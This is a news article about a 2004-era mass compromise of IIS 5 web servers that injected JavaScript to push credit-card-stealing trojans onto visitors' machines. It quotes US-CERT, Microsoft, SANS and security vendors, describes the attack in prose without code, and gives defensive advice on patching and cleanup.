News Stay informed about the latest enterprise technology news and product updates.

UPDATED: Widespread attack under way

A widespread Internet attack has hit thousands of Web sites in the past week, planting malware on vulnerable machines. Credit card thefts suspected motivation.

A widespread Internet attack has hit thousands of Web sites in the past week, planting malware on vulnerable machines that may be designed to steal credit card and other information then marketed to organized identity theft markets, according to government officials and information security experts.

"This is nasty by the look of it," said Scott Blake, vice president of information security at BindView Corp. of Houston. "This appears to be a zero-day exploit, and that's a big concern that's hard to respond to. In this case, we're not sure of a workaround, but we're hoping to come up with one as quickly as possible."

The U.S. Computer Emergency Readiness Team (US-CERT) said in an advisory that it is aware of suspicious activity focused on sites running Microsoft Internet Information Services 5.0 and Internet Explorer, components of Windows.

"Compromised sites are appending JavaScript to the bottom of Web pages," the advisory said. "When executed, this JavaScript attempts to access a file hosted on another server. This file may contain malicious code that can affect the end user's system. US-CERT is investigating the origin of the IIS 5 compromises and the impact of the code that is downloaded to end user systems."

The agency recommends IT administrators running IIS 5 verify that there is no unusual JavaScript appended to the bottom of pages delivered by their Web server and that end users disable JavaScript unless it is absolutely necessary.

Microsoft is also investigating the attack, and said customers who have deployed Windows XP Service Pack 2 RC2 are not at risk. The software giant said in a new security bulletin that Web servers running Windows 2000 Server and IIS that have not applied fixes outlined in MS04-011 are possibly being compromised. The bulletin advises systems administrators to apply the patches in MS04-011.

The Internet Storm Center, a service of the SANS Institute of Bethesda, Md., said in its last report that "a large number of Web sites, some of them quite popular, [were] compromised earlier this week to distribute malicious code." It did not elaborate on which ones were impacted.

"Hundreds to thousands of computers could feasibly be infected in just a few hours using compromised IIS servers as the launching pad for this attack," Ken Dunham, director of malicious code for iDEFENSE Inc. of Reston, Va., said in an e-mail. "Everyone needs to audit recent patches and ensure that computers are fully patched. Additionally, IE users should consider modifying the Windows registry to set the 'kill bit' until a patch is available."

Dunham said such Trojans have historically been developed by the HangUP Team out of Russia, a for-profit malicious code group. They are designed to steal credit card and other information that is then marketed to organized identity theft markets. The HangUP Team is the same group responsible for the recent rash of Korgo worms that attack the LSASS vulnerability of MS04-011.

The Internet Storm Center said, "If a user visited an infected site, the javascript delivered by the site would instruct the user's browser to download an executable from a Russian Web site and install it. Different executables were observed. These Trojan horse programs include keystroke loggers, proxy servers and other back doors providing full access to the infected system."

The report added, "We do not know at this point how the affected servers have been compromised. The SSL-PCT exploit is at the top of our list of suspects. If you find a compromised server, we strongly recommend a complete rebuild. You may be able to get your Web site back into business by changing the footer setting and removing the javascript file. But this is a likely a very sophisticated attack and you should expect other stealthy Backdoors."

Further details of the attack can be found on the storm center site.

Dig Deeper on Web Server Threats and Countermeasures

Start the conversation

Send me notifications when other members comment.

Please create a username to comment.